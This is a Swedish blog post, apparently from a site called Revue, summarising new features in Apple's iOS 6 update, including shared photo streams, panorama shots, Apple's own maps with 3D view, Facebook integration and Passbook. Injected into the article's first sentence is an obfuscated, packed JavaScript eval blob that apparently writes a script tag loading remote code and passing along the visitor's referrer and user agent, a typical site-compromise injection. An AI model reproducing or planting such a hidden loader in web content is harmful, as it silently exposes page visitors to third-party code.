Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

iOS 6: Det här är nyheterna i uppgraderingen

Passbook iphone
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dedzz|var|u0026u|referrer|ittek||js|php’.split(’|’),0,{}))
är det dags. Apple kommer troligen att släppa nästa uppgradering av iOS vilket denna gång är version iOS 6. 

Av det vi fått höra innan så är iOS 6 väldigt lik iOS 5, dvs inga större funktioner kommer att bli tillgängliga.

Vi på Revue har försökt fokusera på höjdpunkterna som vi anser vara hetast.

När släpps iOS 6?

Om man ska gå efter vad Apple själva sagt så kommer uppdateringen att bli tillgänglig någon gång under dagen (runt 19:00 svensk tid). Uppdateringen kommer att kunna laddas ner som vanligt under inställningar -> Programuppdatering och sedan uppdatera. Vi rekommenderar att man gör en säkerhetsuppdatering innan via iCloud, om jag inte minns fel så har jag själv varit med om att förlora data under processen.

iOS 6 kommer att bli tillgängligt till iPhone 3GS, iPhone 4 och 4S. Även andra generationens iPad och fjärde generationens iPod Touch.
För er med första generationens iPad kommer ni tyvärr inte få tillgång till nyheterna.

Sociala bildströmmar och kommentarer

En rolig funktion i iOS 6 är att man nu kommer kunna skapa delade bildströmmar direkt i bild-appen. Med dessa kan du bjuda in vänner med iOS-enhet till att se just den bildströmmen, rätt kul grej för att skapa ett bildforum med endast utvalda personer.

Dock kan inte personen som blivit inbjuden lägga till bilder i strömmen utan endast ägaren. Detta är nog något som jag tror Apple kommer att utveckla ytterligare då det är en väldigt rolig och social tjänst.

Panoramafotografering i iOS 6

Panorama iphone 5

Panoramafotografering är en av höjdpunkterna i kamera-appen. I kameran hittar man funktionen under alternativ och det är super enkelt att ta själva bilden.
Du sveper sakta kameran över det område som du vill göra en panoramabild av, riktigt härligt faktiskt. Bilderna blir väldigt stora, upp mot hela 28 megapixel.

Ny karta med 3D-vy

Kartorna i iOS 6 är helt utbytta från Google Maps. Nu använder Apple istället sin egna. Detta betyder att Googles alla funktioner som innan kunnat användas inte längre finns kvar.
Dockhar man istället valt att addera några egna häftiga funktioner. Min favorit är 3D-vy. Även om detta kanske inte är något man kommer använda rent praktiskt så är det en häftig och innovativ funktion. Och som alltid så finns endast ett par utvalda städer än så länge med 3D-vy.  I Sverige är 3D-vyn aktiverad i enbart Stockholm. Om du sveper med 2 fingrar kan du också ändra lutningen på vyn.

Facebook är nu integrerat

Denna funktion är relativ väntad. Att Apple tillsammans med Facebook nu har interagerat nätverket så man enkelt kan dela med sig av innehåll utan att gå in via Facebook-appen är självklart skönt. Dock har andra smartphones haft denna möjlighet relativt länge så det är inte banbrytande.

Dock kan du inte än tagga personer direkt men detta kommer nog inom en snar framtid.

Passbook

Passbook iphone

Detta är en helt ny fräsch förinstallerad app som Apple valt att lägga till. Jag tycker att det är en riktig smart grej där de låter dig hålla koll på biljetter, kuponger, rabattkort, presentkort och även flygbiljetter. Just nu kan vi inte svara på hur denna funktion kommer fungera i Sverige samt vilka företag som kommer koppla sig till detta men visst vore det schysst om det kom igång. Att Passbook kommer fungera internationellt och framför allt i USA är det inget snack om.

Jag har gärna mitt Boardingcard i mobilen hellre än på papper.

Detta är endast några av de otroligt många förändringar som kommer i iOS 6. Sammanfattat så får ni själva utforska och tycka till senare ikväll när iOS 6 släpps för allmänheten.

Kommentera gärna nedan på vad ni tycker om iOS6!